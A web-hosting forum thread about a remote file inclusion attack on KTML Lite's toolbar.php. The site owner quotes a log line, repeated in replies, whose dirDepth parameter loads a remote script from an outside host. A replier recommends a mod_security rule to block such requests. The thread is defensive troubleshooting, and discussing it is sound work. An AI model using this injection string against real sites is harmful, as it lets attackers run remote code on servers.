Have any of you seen any solution to this problem:
THe problem arises from the following attack: /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt? HTTP/1.1" 200 11213 "http://www.xxxx.xx/ktmlliterf/includes/ ... 2/mass.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
It seems as if youa are able to place phishing code via the two files in ktml
Have a look at the following sites:
http://www.linuxquestions.org/questions ... te-652308/
http://www.placeoweb.com/hack/php/
http://www.securityfocus.com/archive/1/494138
http://www.mail-archive.com/bugtraq@sec ... 27840.html
Could anybody help in finding ways around this securityproblem?
Regards Henri
toolbar.php and index.php dirDepth - hostile injection
Re: toolbar.php and index.php dirDepth - hostile injection
Hi Henri,
Havn't used ktml lite in ages so I can't really comment on it.
How about asking your host to set a mod_sec rule to check for the problem and block it when it happens.
I am sure (might be totally wrong) that the toolbar.php file will never be used with a http parameter so it should be easy enough to check for such an event.
If it is used with a http parameter, you can check that the domain is the same as where the script is running from. You will definetaly not include a file from a remote domain in that manner.
Coding mod_sec rules are not my forte so it will be best to ask your host for assistance.
Havn't used ktml lite in ages so I can't really comment on it.
How about asking your host to set a mod_sec rule to check for the problem and block it when it happens.
I am sure (might be totally wrong) that the toolbar.php file will never be used with a http parameter so it should be easy enough to check for such an event.
If it is used with a http parameter, you can check that the domain is the same as where the script is running from. You will definetaly not include a file from a remote domain in that manner.
Coding mod_sec rules are not my forte so it will be best to ask your host for assistance.
Re: toolbar.php and index.php dirDepth - hostile injection
Thanks for your reply. I will delete the two files, and see if i has any effect.
Re: toolbar.php and index.php dirDepth - hostile injection
What two files do you want to delete?
Deleting toolbar.php will break the script.
What you need to do is check that no-one is calling an external script via the file.
/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt
In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.
Deleting toolbar.php will break the script.
What you need to do is check that no-one is calling an external script via the file.
/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt
In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.
Re: toolbar.php and index.php dirDepth - hostile injection
Thank for your help as it was what I experienced, so I will write the workaround as you have outlined. Thanks againFred wrote:What two files do you want to delete?
Deleting toolbar.php will break the script.
What you need to do is check that no-one is calling an external script via the file.
/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt
In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.
Re: toolbar.php and index.php dirDepth - hostile injection
Glad you solved your problem.
Could you post the rule that you created.
It might be useful for someone else as well
Could you post the rule that you created.
It might be useful for someone else as well